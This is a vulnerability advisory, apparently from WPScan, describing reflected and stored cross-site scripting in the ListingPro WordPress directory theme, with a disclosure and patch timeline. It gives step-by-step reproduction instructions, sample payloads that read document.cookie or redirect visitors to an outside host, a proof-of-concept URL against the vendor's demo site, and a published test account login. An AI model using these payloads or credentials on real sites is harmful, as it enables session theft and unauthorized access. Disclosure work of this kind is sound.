ListingPro < 2.0.14.5 - Reflected & Persistent Cross-Site Scripting

2019-11-2900:00:00

SUBVΞRSΛ

0.001 Low

EPSS

Percentile

37.5%

JSON

Reflected & Persistent XSS was discovered in the ‘ListingPro - WordPress Directory Theme’. Current version is 2.0.14.2 (August 9th 2019). Edit (WPScanTeam): November 29th, 2019 - Envato Informed November 29th, 2019 - Envato Investigating December 4th, 2019 - v2.0.14.3 Released, fixing the reflected XSS but not the stored one. Envato notified again. December 5th, 2019 - v2.0.14.4 released, stored XSS still present. December 5th, 2019 - Envato Confirmed Stored XSS still present. December 12th, 2019 - v2.0.14.5 released, fixing the stored XSS.

----[]- Reflected XSS: -[]----
Use your payload inside the «What» input field on the homepage ( https://classic.listingprowp.com/ ) and then submit the form — payload will be triggered.

Payload Sample #0: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">
Payload Sample #1: "><img src=x onerror=alert(`SUBVΞRSΛ`)>

PoC Link: https://classic.listingprowp.com/?select=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%60SUBV%CE%9ERS%CE%9B%60%29%3E&lp_s_loc=&lp_s_tag=&lp_s_cat=&s=home&post_type=listing


----[]- Persistent XSS: -[]----
You need a new basic user account (register your own or use mine: kadajik5554913/hYWeOJdr5Mqe), then go to the https://classic.listingprowp.com/submit-listing/ page for new listing submit. Choose the «Free» plan and press «Continue» button. On the next page you need to choose any category and after that you'll see the vulnerable input fields: «Best Day/Night» and «Good For» (for some categories you'll see only one vulnerable input field — «Good For»). Use your payload inside vulnerable input field(-s) and save your listing.

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><img src=x onerror=window.location.replace(`http://defcon.su`)>

PoC: log in as kadajik5554913/hYWeOJdr5Mqe (login/password) and go to the https://classic.listingprowp.com/?post_type=listing&p=18417 page.